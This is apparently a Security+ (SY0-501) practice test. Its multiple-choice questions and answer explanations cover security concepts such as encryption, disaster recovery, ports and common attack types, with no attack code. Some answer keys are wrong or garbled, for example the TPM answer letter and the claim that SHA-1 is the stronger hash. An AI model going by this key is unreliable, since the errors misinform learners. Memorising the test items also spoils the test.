CompTIA Security+ Cert. (SY0-501): Practice Tests #3
All of the following are considered secure password creation practices EXCEPT: A.Passwords must include the userid. B.Passwords must not use common dictionary-based words. C.Passwords must use a mixture of uppercase, lowercase, numbers, and special characters. D.Passwords must be of sufficient length.
A.Passwords must include the userid Correct Answer: Passwords should not be created that includes the user's userid. Incorrect Answers: All of these practices contribute to a secure password.
Which of the following is typically conducted as a first step in the overall business continuity/disaster recovery strategy? A.Disaster recovery plan B.System backup plan C.Business continuity plan D.Business impact analysis
D.Business impact analysis The business impact analysis (BIA) is a critical first step in developing the business continuity plan (BCP). It involves determining what risks are present and their effects on the business and its assets. Incorrect Answers: The BCP is the overall and final product that the BIA contributes to. D.The BIA must be completed as one of the first steps, as it essentially is the risk assessment for the BCP. A.The disaster recovery plan (DRP) concerns itself with recovering the assets and operations of the business immediately following a disaster. B.A system backup plan is but one element of the DRP and may or may not be one of the first things accomplished for that plan.
A user complains that he or she cannot access sites that use the HTTPS protocol. Which port should be opened on the firewall to allow this traffic? A.80 B.8080 C.443 D.22
C.443 TCP port 443 is used by HTTPS protocol, which uses SSL as its secure session protocol. Both are associated with port 443. Incorrect Answers: A.Port 80 is used by HTTP, D.port 22 by SSH B.port 8080 by some proxy server implementations.
You are the security administrator for a small company and would like to limit clients that can connect to the wireless network by hardware address. What would you do? A.Implement MAC filtering B.Implement WEP C.Implement NAC D.Enable SSID cloacking
A. Implement MAC filtering MAC address filtering, although not an effective security measure by itself, can be used to limit which clients, by hardware address, can connect to the wireless network. Incorrect Answers: B.WEP is a wireless security protocol. C.NAC prevents clients from connecting that do not meet specified security requirements, such as patch level or antivirus signature. D.SSID cloaking merely prevents potential wireless clients from seeing the wireless network name by stopping it from being broadcast.
Which of the following terms is most accurately defined by the amount of time a business can survive without a particular function? A.Maximum tolerable downtime (MTD) B.Mean time between failures (MTBF) C.Recovery time objective (RTO) D.Recovery point objective (RPO)
A. Maximum tolerable downtime (MTD) The maximum tolerable downtime (MTD) indicates how long an asset may be down or offline without seriously impacting the organization. Incorrect Answers: B.The mean time between failures is an estimate of how long a piece of equipment will perform before failure. C&D.The recovery point objective and recovery time objective refer to how much data may be lost during a failure or disaster and the maximum amount of time it must take to recover the system or data, respectively, before the organization is seriously impacted.
Which of the following is used to verify the integrity of the message? AMessage digest. B.Digital signature C.Digital certificate D.Symmetric key
A. Message digest A message digest, or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message. If the two match, then integrity is assured. If they do not match, then the message was altered between transmission and receipt. Incorrect Answers: C.Digital certificates contain public keys that are distributed to users. B.Digital signatures provide for authentication. D.Symmetric keys are not used to provide for integrity, but confidentiality.
Which of the following protocols is considered a secure replacement for Telnet? A.SSH B.SSL C.TLS D.RLOGIN
A. SSH Secure Shell (SSH) is considered a secure replacement for Telnet. Incorrect Answers: C&BTLS and SSL are secure session protocols used in HTTPS traffic. D.RLOGIN is an older, nonsecure protocol.
Which of the following statements are correct with regard to the concepts of fail-secure and fail-safe? (Choose two.) A.A fail-safe device responds by not doing anything to cause harm when the failure occurs. B.A fail-safe device responds by making sure the device is using a secure state when a failure occurs. C.A fail-secure device responds by not doing anything to cause harm when the failure occurs. D.A fail-secure device responds by making sure the device is using a secure state when a failure occurs.
A.A fail-safe device responds by not doing anything to cause harm when the failure occurs. D.A fail-secure device responds by making sure the device is using a secure state when a failure occurs. A fail-safe device responds by not doing anything to cause harm when the failure occurs. A fail-secure device responds by making sure the device is using a secure state when a failure occurs. Incorrect Answers: The fail-secure answer is the definition of fail-safe, and the fail-safe answer is the definition of fail-secure, not the other way around.
What is the second step in the incident response life cycle? A.Detection and analysis B.Preparation C.Containment, eradication, and recovery D.Post-incident activity
A.Detection and analysis Correct Answer: Detection and analysis is the second step of the incident response life cycle. Incorrect Answers: In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.
During which type of assessment would penetration testers not have any knowledge about the network and network defenders have no knowledge of the test itself? A.Double-blind test B.Blind test C.Gray box test D.Black box test
A.Double-blind test In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders have no prior knowledge of the test and aren't aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders' abilities to detect and respond to attacks and to test and exploit vulnerabilities on the network. Incorrect Answers: B&D.In a black box test, only the testers have no knowledge of details about this network configuration. This type of test is also referred to as a blind test. C.In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.
Which of the following describes an alternate processing site that is instantly available in the event of a disaster? A.Hot site B.Cold site C.Reciprocal site D.Warm site
A.Hot site A hot site is an alternate processing site that can function almost immediately after a disaster and has equipment and data prepositioned, as well as full utilities. Incorrect Answers: B.Cold sites have only space and utilities available and take longer to activate. D.Warm sites have space, utilities, and possibly some equipment and furniture, but still need equipment, personnel, and data transferred, so they cannot be activated instantly. C.Reciprocal sites are alternate locations provided by and in agreement with another organization and are typically co-located with that organization.
An example of the risk mitigation strategy that involves transferring risk to another entity would be: A.Insurance B.Separation of duties C.Alternate site D.Service-level agreement
A.Insurance Insurance is a method of risk transference where the organization pays a premium for the insurance company to assume the risk. If a disaster or event occurs, the organization is paid for its losses. Incorrect Answers: B.Separation of duties transfers key duties to another individual but does not transfer the risk away from the organization. D.A service-level agreement between two parties specifies levels of service and support, but the organization still maintains risk. C.An alternate site is used to transfer operations from a primary site in the event of a disaster, but the risk is still borne by the organization.
Which of the following is a form of intentional interference with a wireless network? A.Jamming B.Evil twin C.MAC spoofing D.SSID cloaking
A.Jamming Jamming is an intentional interference with the signal of a wireless network. It is often part of a DoS attack. Incorrect Answers: B.An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point. D.SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network's service set identifier. C.MAC spoofing is an attempt to impersonate another host by using its MAC address.
Which of the following disaster recovery technologies is used to help protect you from failures related to a hard disk? A.RAID B.Network load balancing C.Striping without parity D.Clustering
A.RAID Redundant Array of Independent Disks (RAID) is used to provide for fault tolerance and recovery against disk failures. Incorrect Answers: C.Striping is used to improve performance but offers no fault tolerance unless used with parity bits. D.Clustering is used to provide server fault tolerance. B.Network load balancing is used to enhance network performance through balancing network traffic among servers.
Which of the following is an example of a trusted OS? A.SELinux B.Windows Server C.Windows 10 D.Ubuntu Linux
A.SELinux SELinux is the only example, from the answers given, of a trusted operating system. Incorrect Answers: These operating systems are not considered trusted operating systems, although they can be hardened to varying degrees.
Which of the following algorithms is the stronger hashing algorithm? A.SHA-1 B.3DES C.MD5 D.AES-256
A.SHA-1 SHA-1 (secure hashing algorithm) generates a 160-bit hash. Incorrect Answers; C.MD5 is a hashing algorithm that generates a 128-bit hash, which is weaker than SHA-1. B&D.3DES and AES-256 are symmetric encryption algorithms, not hashing algorithms
When working with asymmetric encryption, which of the following is used to encrypt a message sent from Bob to Sue? A.Sue's public key B.Sue's private key C.Bob's private key D.Bob's public key
A.Sues public key Sue's public key is used to encrypt a message from Bob to Sue, as only Sue's private key can decrypt it. Incorrect Answers: B.Sue's private key can only decrypt the message, and Bob does not possess it. C&D.Neither of Bob's keys can be used to encrypt a confidential message to Sue.
Which of the following protocols is a more secure version of the SSL protocol? A.TLS B.RSA C.AES D.SSH
A.TLS Transport Layer Security (TLS) is considered a strong replacement for SSL. Correct Answers: D.SSH is a secure replacement for Telnet and other nonsecure protocols. C.AES is a symmetric algorithm that replaces DES. B.RSA is an asymmetric algorithm used in public key cryptography.
In a PKI infrastructure, what is the name of the list that contains all the certificates that have been deemed invalid? A.Certificate invalidation list B.Certificate revocation list C.Certificate authority D.Certificate denial list
B. Certificate revocation list A certificate revocation list (CRL) contains a list of all invalid or revoked certificates. Incorrect Answers: A&D.A certificate denial list and certificate invalidation list are false choices and do not exist. C.A certificate authority is responsible for issuing certificates.
Which of the following steps is the first to be accomplished during a penetration test? A.Password cracking B.Obtain permission for the test C.Port scanning D.Privilege escalation
B. Obtain permission for the test Before beginning any type of penetration test or vulnerability assessment, you must first obtain permission from the responsible system owner to avoid legal or liability issues. Incorrect Answers: Although these are all valid steps to take during a penetration test or vulnerability assessment, none of these should be started without obtaining permission from the responsible system owner.
Which of the following network devices provides centralized authentication services for secure remote access connections? A.Firewall B.VPN concentrator C.Router D.Proxy server
B. VPN Concentrator A VPN concentrator serves as a centralized authentication point for virtual private network connections. Incorrect Answers: None of these devices are used to provide centralized authentication services for secure remote access connections.
Which of the following attacks is NOT typically attempted by a rogue access point on a wireless network? A.Interference B.Brute force C.Spoofing D.Evil twin
B.Brute force A brute-force attack is typically a password attack. It may be used separately to break wireless passwords but is not unique to wireless attacks. Incorrect Answers: All of these are attack methods that a rogue access point could attempt to engage in, resulting in a denial-of-service condition on the wireless network (as in the case of intentional interference), or by spoofing valid access points to entice an unsuspecting client to connect to it.
Which of the following technologies is NOT typically used to design secure network architectures? A.VLAN B.Clustering C.VPN D.DMZ
B.Clustering Although it is part of high availability design, clustering is not typically used in the design and implementation of a secure network architecture. Incorrect Answers: D.DMZs are used as a security buffer zone to separate internal networks and resources from externally accessible ones. A.VLANs are used to segregate local networks, providing a secure internal infrastructure. C.VPNs provide for secure remote access solutions.
Which of the following attacks seeks to introduce erroneous or malicious entries into a server's hostname-to-IP address cache or zone file? A.Session hijacking B.DNS poisoning C.ARP poisoning D.DHCP poisoning
B.DNS poisoning DNS poisoning involves introducing false entries into a DNS server's zone file, or a server's hostname-to-IP address cache, both with the intent of misdirecting a DNS resolution request to a different server or site. Incorrect Answer: C.ARP poisoning involves introducing false entries into a host's ARP cache, which maps MAC addresses to IP addresses. D.DHCP poisoning is a false term, although there are several known DHCP network attacks. A.Session hijacking involves intercepting and taking over an in-progress communications session between two hosts.
Which of the following DES/AES encryption modes is considered the weakest? A.CTR B.ECB C.OFB D.CBC
B.ECB With ECB mode, a given piece of plaintext will always produce the same corresponding piece of ciphertext. This predicability makes it weak. Incorrect Answers: While CBC, OFB, and CTR mode go about the processes in different ways, these modes lack ECB's predicability, adding strength to the underlying cryptosystem.
All of the following are advantages to using NAT, EXCEPT: A.Internal network addresses are hidden from the public. B.Firewalls and other security devices are not required. C.Specific network traffic can be sent to a particular internal address and port. D.Public IP addresses can be more effectively used by the organization.
B.Firewalls and other security devices are not required. Even when using NAT, firewalls and security devices are required on a network boundary. Incorrect Answers: All of these are advantages to using NAT.
Which type of intrusion detection system identifies suspicious activity by monitoring log files on the system? A.NIPS B.HIDS C.ACL D.NIDS
B.HIDS A host-based intrusion detection system (HIDS) monitors local system activity and logs for indications of an attack. Correct Answers: D.A NIDS is a network-based intrusion detection system and does not monitor host log files. A.A NIPS is a network-based intrusion prevention system and works on the network instead of the host. C.An ACL is an access control list and is used to allow or deny traffic through a router or grant/deny permissions to resources.
Your company has a salesperson who travels a lot and will be connecting to hotel networks. What security recommendation would you make for her laptop? A. Unencrypted drive B.Host-based firewall C.Null password D.FDE
B.Host-based firewall A host-based firewall should be used when connecting to untrusted networks, such as one in a hotel. Incorrect Answers: A.Having an unencrypted drive and null password are not security recommendations. D.Although full disk encryption (FDE) can help if the laptop is lost or stolen, it will not help you in situations when you are making connections to an unknown and potentially unsecure network. C.You could potentially be infected with a virus by connecting to an unknown network without having a firewall enabled, or be vulnerable to an attack.
Which of the following security measures helps ensure data protection in the event a mobile device is lost or stolen? A.Remote destruction B.Remote wiping C.Remote encryption D.Remote access
B.Remote wiping Remote drive or disk wiping is used to ensure data protection and confidentiality on a mobile device in the event it is lost or stolen. Incorrect Answers: A&C..Remote destruction and remote encryption are invalid terms in this context. D.Remote access enables a remote user to authenticate to and access an organization's private network.
Which of the following identifies an example of two-factor authentication? A.Password and PIN B.Smartcard and PIN C.Username and password D.Fingerprint and retina
B.Smartcard and PIN The use of a smartcard and PIN involves the use of two factors: something you have and something you know. Incorrect Answers: All of the other answers involve the use of only one factor: something you are or something you know, but not used together.
Which of the following attacks might involve an attacker attempting to enter a facility with arms full of boxes, in an attempt to gain sympathy and have someone open the door for him or her? A.Impersonation B.Tailgating C.Dumpster diving D.Shoulder surfing
B.Tailgating A tailgating person might use some sort of creative pretext to convince someone to open the door and allow him or her to enter without proper identification. Incorrect Answers: C&D.Neither shoulder surfing nor dumpster diving are attempts to enter a facility. A.Impersonation could be used to enter a facility, but it is not being used to do so in this case.
Which of the following statements best defines the recovery point objective (RPO)? A.The RPO is the maximum amount of time the organization can afford to be down from normal processing. B.The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident. C.The RPO is the maximum allowable amount of data (measured in gigabytes) that the organization can afford to lose during a disaster or an incident. D.The RPO is the minimum amount of data the organization is expected to lose during a disaster or an incident. E.Virus
B.The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident. The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident. Incorrect Answers: The RPO is the maximum amount of data, not the minimum, that can be lost during a disaster or an incident. RPO refers to data that can be lost, not time itself. RPO is measured in time, not gigabytes.
Which of the following describes the best security practice to use when granting users elevated or administrative privileges? A.Administrative privileges should be granted directly to those user accounts that perform administrative-level tasks. B.Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. C.Users who perform administrative-level tasks should be given the Domain Administrator user account name and password. Users who require higher privileges should be placed in the Administrators group.
B.Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges. Incorrect Answers: None of these choices are considered to be good security practices. User accounts should not be directly granted administrative privileges, and ordinary user-level accounts should not be placed in the Administrators group. Additionally, no one should be given the Domain Administrator's username and password to use on a routine basis.
Which of the following is the best way to prevent cross-site scripting attacks? A.Block ports 443 and 80 on the firewall B.Validate the input into a web site for illegal characters in a particular field C.Restrict CGI script execution D.Require certificate-based authentication for web site access
B.Validate the input into a web site for illegal characters in a particular field Validating the input into a web site form for illegal characters in a field is the best choice for preventing cross-site scripting (XSS) attacks. Incorrect Answers: A.Blocking ports 443 and 80 will make the site unusable, as these are the typical ports used to access web sites. D.Requiring certificate-based authentication will not prevent cross-site scripting attacks and is an unnecessary measure. C.CGI is not a method used for cross-site scripting attacks.
You are performing a site survey of a company location and notice that one of the wireless access points is on top of a bookshelf that is located by the outer wall of the building. What is the security concern? A.Signal degradation B.Wireless network access by persons outside the building C.Interference D.Damage due to falling
B.Wireless network access by persons outside the building Because of the placement near the outer wall, the wireless access point's signals could be detected outside the building and could allow an unauthorized user to eavesdrop on or use the connection. Incorrect Answers: D.Damage due to falling is a concern, but not the most immediate security concern. C.Interference could happen only if other wireless devices are nearby that transmit on frequencies close to the one that the access point uses. A,This is a performance concern, but not typically a security concern unless it is malicious in nature and seeks to cause a denial-of-service condition. Signal degradation for the rest of the facility would not be caused by the placement of the access point next to the outer wall.
Which of the following are considered symmetric encryption algorithms? (Choose two.) A.SHA B.RSA C.3DES D.MD5 E.AES
C.3DES D.AES AES and 3DES are considered encryption standards and use symmetric algorithms. Incorrect Answers: A&D.SHA and MD5 are hashing algorithms, and RSA is an asymmetric algorithm.
Which of the following statements bests describes a Trusted Platform Module? A.A code module that performs authentication B.A hardware module that performs cryptographic functions C.A secure logon module D.A software module that prevents application attacks
C.A secure logon module A Trusted Platform Module (TPM) is a hardware device, usually in the form of an embedded chip, that performs cryptographic functions, such as encrypting an entire hard drive. Incorrect Answers: None of these are valid choices to describe a Trusted Platform Module.
All of the following are types of penetration testing EXCEPT: A.Gray box B.Black box C.Blue box D.White box
C.Blue box Blue box testing is not a type of penetration testing. Incorrect Answers: A.In gray box testing, the tester may have some knowledge given to them, such as an infrastructure diagram or IP address list. I B.Black box testing involves a penetration test where the test team has no knowledge of the network. D.In a white box test, the test team has full and detailed knowledge of the network, its design, functions, and applications.
A printed e-mail would be considered which kind of evidence? A.Demonstrative evidence B.Direct evidence C.Documentary evidence D.Real evidence
C.Documentary evidence Documentary evidence is usually a printed form of evidence, a recording, or photograph. Incorrect Answers: D.Real (or physical) evidence is a tangible object presented in court (such as a weapon). C.Direct evidence is testimony from someone who actually witnessed the event. A.Demonstrative evidence is presenting a physical object that displays the results of an event that occurred.
When performing an investigation on a mobile device, you would like to ensure that you shield the device from sending or receiving signals. What would you use? A.Spectrum analyzer B.Protocol analyzer C.Faraday cage D.Signal reducer
C.Faraday cage A Faraday cage can be used to shield devices from sending or receiving electronic signals. Incorrect Answers: B.A protocol analyzer is used to capture and view network traffic. A.A spectrum analyzer is used for site surveys when designing wireless networks. D.A signal reducer is not a device used in this context.
Which of the following choices concerns itself with ensuring that data is not modified or destroyed while in storage or transit? A.Confidentiality B.Availability C.Integrity D.Nonrepudiation
C.Integrity Integrity is concerned with ensuring that data is not modified. Incorrect Answers: A.Confidentiality protects information from unauthorized access. B.Availability provides for information and systems to be online and ready for users at any time. D.Nonrepudiation means that a user cannot deny that he or she took an action.
Which of the following keys is used for nonrepudiation? A.Public key B.Symmetric key C.Private key D.Hash
C.Private key The private key, when used for nonrepudiation, is used to encrypt text that anyone who possesses the public key can decrypt. This assures that only the person owning the private key could have encrypted it, ensuring that he or she is the one who performed the action. Incorrect Answers: Used in this scenario, this does not guarantee confidentiality, but it does provide for nonrepudiation. B&D.Symmetric keys and hashes do not provide for nonrepudiation, because they cannot be used to guarantee who sent a message or performed an action. A.Public keys can be in the possession of anyone and are used in this case to verify that the private key was used to encrypt the text for nonrepudiation.
The risk that remains after all reducing and mitigation actions have been taken is called: A.Mitigated risk B.Accepted risk C.Residual risk D.Low risk
C.Residual risk Residual risk is what risk remains after all mitigation and reduction strategies have been implemented. Incorrect Answers: D.Low risk is a level that may be accepted without mitigation or requires little mitigation. B.Accepted risk is what risk the management authority chooses to accept with or without mitigations in place. A.Mitigated risk is that risk that has been reduced to a lower level.
Which of the following network management protocols uses agents that respond to queries to report its status to a central program manager? A.SMTP B.SSH C.SNMP D.SHTTP
C.SNMP The Simple Network Management Protocol (SNMP) uses SNMP agents that respond to queries to report their status to a central program manager. Incorrect Answers: These protocols are not used to manage network devices.
Which of the following networking technologies provides for local area network segregation using switches? A.VPN B.Virtualization C.VLAN D.RADIUS
C.VLAN VLANs (virtual LANs) provide for local area network segmentation and separation and are implemented on switches. Incorrect Answers: D.RADIUS is a remote access authentication technology. B.Virtualization refers to the creation and management of virtual hosts running in a virtualized environment. A.VPN is a secure remote access technology.
Which of the following files might the hacker modify in order to redirect a user to the wrong web site? A.ARP cache B.lmhosts C.hosts D.services
C.hosts The hosts file on a local machine provides for fully qualified domain name (FQDN) resolution in the absence of DNS and can be used to redirect users to the wrong web site. Incorrect Answers: B.The lmhosts file is a Windows-specific file that maps computer names to IP addresses. D.The services file lists well-known services, such as HTTP and FTP. A.The ARP cache contains recently resolved local network IP addresses to MAC addresses
Which of the following simple command-line tools would be used from the host to determine what open ports a host is listening on? A.ifconfig B.nbtstat C.netstat D.ping
C.netstat Correct Answer: netstat is a tool found on both Unix/Linux and Windows hosts that can give network statistics and connection information, including port usage. This would help determine if a host is listening on an unexpected or unwanted port. Incorrect Answers: None of the other choices give information on open ports. B.nbtstat is a command found only on Windows hosts and gives NetBIOS usage information. D.Ping is found on both Unix/Linux and Windows hosts but only sends simple ICMP requests to a host. A.ifconfig is found only on Unix and Linux hosts and only gives network interface configuration information.
What is the security term for disabling unnecessary services on a system and uninstalling unnecessary software? A.System hardening B.Network hardening C.System reduction D.Application restricition
A. System hardening System hardening involves disabling unnecessary services and protocols on a host, as well as uninstalling software that is not needed. Incorrect Answers: C.System reduction, network hardening and application restriction are incorrect. These are nonexistent terms used as distractors.
You are troubleshooting a communication issue on the network. Which of the following protocols is responsible for converting the IP address to a MAC address? A.ARP B.DNS C.RARP D.DHCP
A.ARP Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses. Incorrect Answers: C.RARP, the Reverse Address Resolution Protocol, resolves MAC addresses to IP addresses' the exact opposite of ARP. B.DNS, the Domain Name System, resolves fully qualified domain names (FQDN) to IP addresses. D.DHCP, the Dynamic Host Configuration Protocol, dynamically issues IP addressing information to hosts.
Which of the following identifies a security reason to perform a site survey to identify rogue access points? A.Bypass security controls B.Frequency overlap C.Interference D.Signal propagation
A.Bypass security controls Rogue wireless routers could be used by unauthorized individuals to access the network and bypass security controls such as firewalls. Incorrect Answers: These issues may affect performance and can be important to security, but do not have a direct impact on securing the wireless network.
Which of the following is used to identify certificates that are no longer valid for use? A.CRL B.CAL C.CA D.PKS
A.CRL The certificate revocation list (CRL) is used to identify invalid certificates. Incorrect Answers: B.A CAL is a client access license. D.PKS is a cryptographic file standard C.CA is a certificate authority, which issues certificates.
Which of the following goals of information security deals with identifying modifications to data? A.Integrity B.Availability C.Nonrepudiation D.Confidentiality
A.Integrity Integrity provides for detection of data modification. Incorrect Answers: D.Confidentiality deals with protecting data from unauthorized access, not modification. B.Availability ensures data and systems are available to authorized users whenever needed. C.Nonrepudiation involves preventing a user from denying that he or she performed an action.
All of the following are potential application security issues requiring attention EXCEPT: A.SQL injection B.Buffer overflows C.Cross-site scripting D.Malware
D. Malware Malware is a security issue, but not specific to any applications. Incorrect Answers: All of these are potential application security issues that could affect both web-based and client-server applications.
Administrators who grant access to resources by placing users in groups are using which type of access control model? A.Role-based access control B.Discretionary access control C.Mandatory access control D.Rule-based access control
A.Role-based access control Role-based access control grants access to groups performing specific functions, or roles, but not to individuals. Incorrect Answers: B.Discretionary access control allows data owners/creators to grant access to individuals or groups. C.Mandatory access control permits only administrators to grant access, based upon security labels. D.Rule-based access control grants access to resources based upon specific rules associated with the resource.
The network administrator for your office has configured the company web site for SSL by applying a certificate to the site. What port will you need to open on the firewall to allow communication to the site? A.80 B.22 C.53 D.443
D.443 TCP port 443 must be opened on the firewall to allow SSL traffic to pass. Incorrect Answers: None of these ports are used by SSL.
You are configuring IPSec on your network and need to allow for security association (SA) traffic to pass through the firewall. Which of the following ports does the Internet Key Exchange (IKE) protocol, which is the protocol responsible for the SA setup within IPSec, use? A.443 B.22 C.8080 D.500
D.500. IKE uses UDP port 500. Incorrect Answers: A.A.Port 443 is used by SSL B.22 is used by SSH, C, 8080 does not fall into the range of well-known ports (0?1023) but is frequently used by proxy servers and other security devices.
Which of the following statements best describes the concept of "implicit deny"? A.Anything that is not specifically denied is specifically allowed. B.Anything that is not specifically denied is allowed by default. C.Anything that is not specifically allowed is specifically denied. D.Anything that is not specifically allowed is denied by default.
D.Anything that is not specifically allowed is denied by default. Anything that is not specified as allowed is typically denied, with no deny rules necessary. Incorrect Answers: It is implicitly denied, versus explicitly denied. These statements would describe an explicit deny, an explicit allow, and an implicit allow, respectively.
A "deny any-any" rule in a firewall ruleset is normally placed: A.Nowhere in the ruleset if it has a default allow policy. B.At the top of the ruleset. C.Below the last allow rule, but above the first deny rule in the ruleset. D.At the bottom of the ruleset.
D.At the bottom of the ruleset. A "deny any-any" rule denies all traffic from all sources, so it should be the last rule in the ruleset. Incorrect Answers: Placement of the "deny-any-any" rule anywhere else in the ruleset would prevent any other rules that follow it from processing.
Which of the following wireless attacks specifically attempts to take control of or use Bluetooth-enabled cell phones to make unauthorized calls? A.Bluesniffing B.Bluejacking C.Bluesnarfing D.Bluebugging
D.Bluebugging Bluebugging, the most serious of the various Bluetooth attacks, involves an attacker attempting to take control of or use a Bluetooth-enabled cell phone to place calls. Incorrect Answers: B.Bluejacking is the act of sending unsolicited messages or files to a Bluetooth device. C.Bluesnarfing is a more serious attack than Bluejacking and involves unauthorized access to information on a Bluetooth-enabled device. Bluesniffing is a false, nonexistent term.
Which of the following application attacks allows attackers to inject client-side script into web pages viewed by other users? A.SQL injection B.Buffer overflow C.XML injection D.Cross-site scripting
D.Cross site scripting Cross-site scripting (XSS) enables attackers to inject client-side scripts into web pages viewed by others. Incorrect Answers: C.XML injection occurs when malicious XML code is inserted into an XML statement. A.SQL injection involves inserting faulty SQL input commands into a site that connects to a database, producing unintended results or returning privileged information. B.A buffer overflow takes advantage of programming flaws that occur when data overwrites a program?s allocated memory address and enables arbitrary code to be executed in that address.
Your manager has read a lot about server virtualization and is wondering if there are any security benefits to using server virtualization. How would you respond? Larger hardware footprint More work required to harden systems Decentralized server security Fewer systems to physically secure
D.Fewer systems to physically secure Virtualization results in fewer physical systems (and less hardware) that must be secured. Incorrect Answers: None of the other choices offer any benefits, security or otherwise, of virtualization.
Which of the following techniques involves sending unexpected or invalid data to an application to determine vulnerabilities? A.Cracking B.Spoofing C.Scanning D.Fuzzing
D.Fuzzing Fuzzing is an application vulnerability testing technique that sends invalid or unexpected data to the application, with the intent to see if any security vulnerabilities exist. Incorrect Answers: A.Cracking typically involves passwords, not applications. C.Scanning usually means network port or service scanning. B.Spoofing means to masquerade as another entity, usually by spoofing an IP address, MAC address, or user.
When a user types his or her username into a logon screen, this is known as ___________? A.Authorization B.Authentication C.Impersonation D.Identification
D.Identification Identification is the first step in the process and involves the user presenting his or her credentials to the server. Incorrect Answers: B.Authentication occurs after identification and involves the user?s credentials being authenticated by the server. A.Authorization refers to granting an authenticated user the correct access to an object. C.Impersonation is an invalid term in this context.
Which authentication technology makes use of a key distribution center composed of an authentication server and a ticket-granting service? A.Single sign-on B.RADIUS C.Sesame D.Kerberos
D.Kerberos Kerberos uses a key distribution center (KDC), which consists of an authentication server and a ticket-granting service. Incorrect Answers: None of these choices is associated with these terms.
Which of the following types of malware is designed to activate after a predetermined amount of time or upon a specific event or date? A.Rootkit B.Adware C.Trojan D.Logic bomb
D.Logic bomb Correct Answer: A logic bomb is a type of malware, usually very difficult to detect, that is designed to activate only after a specific time has passed or a specific date or event has occurred. Incorrect Answers: These other types of malware are not tied to specific dates or events.
Which type of cloud service is usually operated by a third-party provider that sells or rents "pieces" of the cloud to different entities, such as small businesses or large corporations, to use as they need? A.Private B.External C.Community D.Public
D.Public A public cloud is operated by a third-party provider who leases space in the cloud to anyone who needs it. Incorrect Answers: B.An external cloud is not a valid type of cloud and could be a public, private, or community cloud. A.A private cloud is for use only by one organization and is usually hosted by that organization?s infrastructure. C.A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.
Which of the following best describes a minimum password age setting? A.Users must change passwords after a certain amount of time. B.Users must not change passwords until a certain date. C.Passwords cannot be reused until they have been expired a certain amount of time. D.Users must wait a certain amount of time before they are allowed to change passwords.
D.Users must wait a certain amount of time before they are allowed to change passwords. A minimum password age requires that users must wait a certain amount of time before they are allowed to change passwords. Incorrect Answers: A.A maximum password age setting requires that users must change passwords after a certain amount of time. B.Passwords are typically good only for a certain amount of time, not through a certain date. C.Passwords typically cannot be reused until a certain number of password changes have occurred, preventing the use of the last specified number of passwords.
The hacker has managed to modify the cache on the system that stores the IP address and corresponding MAC address with inappropriate entries. What type of attack has occurred? A.DHCP poisoning B.ARP poisoning C.DNS poisoning D.VLAN poisoning
B.ARP poisoning ARP poisoning involves introducing false entries into the host's ARP cache, essentially spoofing MAC addresses. Incorrect Answers: C.DNS poisoning involves introducing false entries into a DNS server's cache or its zone files. A&D.DHCP and VLAN poisoning are invalid answers.
All of the following are considered secure application development practices EXCEPT: A.Memory management B.Back doors C.Error and exception handling D.Input validation
B.Back doors Back doors are a security risk due to the possibility that an attacker could use them to gain unauthorized access to the program. Incorrect Answers: All of these are considered secure coding and application development practices.
When users connect to the wireless network, management wants them to receive a message asking them to agree to the terms of use before being granted wireless network access. What network service could be used to perform this goal? A.Multifactor authentication B.Kerberos C.NAC D.PKI
B.NAC Network access control (NAC) can be used to enforce logon or connection banners that will require users to agree to terms of use before being allowed to connect to the network. Incorrect Answers; None of these other technologies can be used to enforce logon warning banners requiring users to agree to terms of use before being allowed to access the network.
Which of the wireless encryption protocols uses the RC4 symmetric algorithm for encrypting wireless communication? A.TLS B.WEP C.WPA2 D.EAP
B.WEP WEP (Wired Equivalent Privacy) uses a faulty implementation of the RC4 protocol, in addition to weak initialization vectors, making it an unsecure wireless protocol and as a result should never be used. Incorrect Answers: None of these other protocols use RC4.
You have an Internet-facing web server that only serves static web pages to users. Recently you have discovered that someone has been using your server as a mail relay. Which service and port should you remove to stop this type of attack? A.SMTP, port 110 B.HTTP, port 80 C.SMTP, port 25 D.HTTP, port 443
C. SMTP,port 25 Simple Mail Transport Protocol (SMTP) uses TCP port 25 and is used to send e-mail and should not be running on an Internet-facing server that only provides a web site. Incorrect Answers: D.HTTP (port 80) must be allowed to run on the server to provide web content to users. C.SMTP uses port 25, not port 110. Port 110 is used by POP3 to receive e-mail messages. HTTPS uses port 443, not HTTP.
What is the term used when two different pieces of data generate the same hash value? Crossover error Disruption Collision (Correct) Interference
C.Collision A collision occurs when two pieces of plaintext are hashed and produce identical hashes. Incorrect Answers: A.A crossover error is a reference to biometric authentication factors. D.Interference refers to wireless networks B.disruption is an invalid term in this context.
An attack in which an attacker attempts to disconnect a victim?s wireless host from its access point is called a(n) __________. A.Replay attack B.Spoofing C.Deauthentication attack D.Initialization vector attack
C.Deauthentication attack A deauthentication attack involves sending specially-crafted traffic to both a wireless client and an access point, in the hopes of causing them to deauthenticate with each other and disconnect. Incorrect Answers: B.A spoofing attack involves impersonating a wireless client or access point, either through its IP or MAC address. A.A replay attack involves the reuse of intercepted non-secure credentials to gain access to a system or network. D.Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.
Which of the following security controls is designed to prevent tailgating? A.Least privilege B.Multifactor authentication C.Mantrap D.Separation of duties
C.Mantrap A mantrap, an area between two locked doors from which the second door cannot be opened until the first door is locked, is designed to allow only one person at a time to enter a facility, effectively preventing tailgating. Incorrect Answers: A&D.Separation of duties and least privilege are two security principles designed to prevent collusion and elevated privileges, respectively. B.Multifactor authentication is designed to positively identify and authenticate an individual but does not prevent tailgating.
